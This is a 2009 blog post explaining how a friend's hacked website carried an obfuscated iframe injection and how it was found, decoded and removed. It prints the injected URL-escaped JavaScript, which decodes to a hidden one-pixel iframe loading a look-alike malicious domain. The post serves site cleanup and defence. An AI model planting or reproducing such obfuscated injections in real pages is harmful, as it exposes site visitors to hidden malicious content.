Saturday, October 31, 2009

Obfuscated iFrame Injection Attacks

I have written several popular articles on iframe injections as you will find in this blog.

The people who implemented my suggestions, reported they had quite a bit of success in avoiding these malicious iframe injection attacks. Their websites were now safe and their traffic was continuous.

I had a friend who was a victim of these iframe injection attacks. When I tested his site, all tests indicated that his site was clean, but yet I knew this could not be the case. I checked all his index.* files and could not find any obvious hidden iframes. What I did notice was some codes that were obfuscated that my friend had no explanation for.

Obfuscation is the concealment of meaning in communication, making communication confusing, intentionally ambiguous, and more difficult to interpret. It is basically a form of encryption. The web page is not really encrypted, or else the web page would not display when accessed. The web browser can tell the difference between this encrypted code and regular HTML, but the human eye cannot decipher the encrypted code.

Upon further investigation, I found that compromised websites can be infected with hidden iframes and/or with obfuscated (escaped) javascript code. My friend's website appeared to be a victim of this obfuscated iframe injection.

The following was the suspected malicious iframe injection obfuscated code:

[Script Language='Javascript']
[!--
document.write(unescape('%5B%69%66%72%61%6D%65%20%73%72%63%3D%20%68%74%74%70%3A%20%2F%2F%67%6F%6F%6F%6F%67%6C%65%61%64%73%65%6E%63%65%2E%62%69%7A%2F%5F%63%6C%69%63%6B%3D%38%46%39%44%41%20%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%20%76%69%73%69%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%20%5D%5B%2F%69%66%72%61%6D%65%5D'));
//-->
[/Script]

Researching the issue further I found a website that was able to deobfuscate, or decrypt, the code at:

http://www.novirusthanks.org/services/javascript-unescape/

or at:

http://www.patzcatz.com/unescape.htm

What you do is copy only the obsfuscated code as shown below:

%5B%69%66%72%61%6D%65%20%73%72%63%3D%20%68%74%74%70%3A%20%2F%2F%67%6F%6F%6F%6F%67%6C%65%61%64%73%65%6E%63%65%2E%62%69%7A%2F%5F%63%6C%69%63%6B%3D%38%46%39%44%41%20%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%20%76%69%73%69%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%20%5D%5B%2F%69%66%72%61%6D%65%5D

You then paste the code into the form box they provide and then click on "Deobfuscate".

The following was the resulting malicious iframe injection code:

[iframe src= http: //goooogleadsence.biz/_click=8F9DA width=1 height=1 style= visibility:hidden;position:absolute ][/iframe]

By completely removing the obfuscated (escaped) javascript code, my friend's website was clean and safe again.

If you implement my suggestions, particulariy the CHMOD 444, after an iframe injection attack, and are fairly sure your website is clean, then chances are you may not be a victim of iframe injection obfuscated (escaped) javascript code. One must not forget though, that no website will ever be 100% secure which is why we must always practise preventative measures.

It is also important to remember that not all iframes are bad. Before you remove a suspected iframe, make sure it is not relevant to your web page. You might want to download a copy of the web page before you do any deleting just to be sure if your are not certain.

No comments:

Post a Comment